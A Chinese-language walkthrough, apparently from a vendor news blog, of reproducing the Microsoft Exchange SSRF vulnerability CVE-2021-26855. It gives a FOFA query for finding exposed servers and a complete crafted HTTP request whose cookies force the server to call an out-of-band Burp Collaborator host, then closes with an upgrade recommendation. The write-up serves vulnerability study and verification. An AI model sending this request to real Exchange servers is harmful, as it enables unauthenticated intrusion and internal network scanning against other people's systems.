怎么實現Exchange SSRF漏洞CVE-2021-26855的分析

這期內容當中小編將會給大家帶來有關怎么實現Exchange SSRF漏洞CVE-2021-26855的分析，文章內容豐富且以專業的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

0x01 漏洞說明

Exchange Server 是微軟公司的一套電子郵件服務組件，是個消息與協作系統。2021年03月3日，微軟官方發布了Microsoft Exchange安全更新，披露了多個高危嚴重漏洞，其中：在 CVE-2021-26855 Exchange SSRF漏洞中，攻擊者可直接構造惡意請求，以Exchange server的身份發起任意HTTP請求，掃描內網，并且可獲取Exchange用戶信息。該漏洞利用無需身份認證。

0x02 影響版本

Exchange 2013 Versions < 15.00.1497.012,

Exchange 2016 CU18 < 15.01.2106.013,

Exchange 2016 CU19 < 15.01.2176.009,

Exchange 2019 CU7 < 15.02.0721.013,

Exchange 2019 CU8 < 15.02.0792.010。

0x03 漏洞復現

fofa 搜索：app=“Exchange”（注意：互聯網的非授權利用屬于違法行為）

訪問outlook頁面

開啟burp抓包，構造數據包：

GET /owa/auth/x.js HTTP/1.1
Host: IP
Connection: close
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://IP/owa/auth/logon.aspx?url=https%3a%2f%2PIp%2fowa%2f&reason=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;

訪問url為：https://xxx.xxx.xxx.xxx/owa/auth/x.js（貌似x.js可以隨便構造）

構造Cookie信息為：

Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;

其中"oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net"為dnslog信息。

可使用burp自帶的dnglog進行驗證：

點擊burp，選擇Burp collaborator client：

各個DNSLog提示信息不一樣，但是都可以成功返回信息：

1.dnslog.cn

2.ceye：

3.零組Dnslog

0x04 修復建議

升級到最新安全版本

上述就是小編為大家分享的怎么實現Exchange SSRF漏洞CVE-2021-26855的分析了，如果剛好有類似的疑惑，不妨參照上述分析進行理解。如果想知道更多相關知識，歡迎關注億速云行業資訊頻道。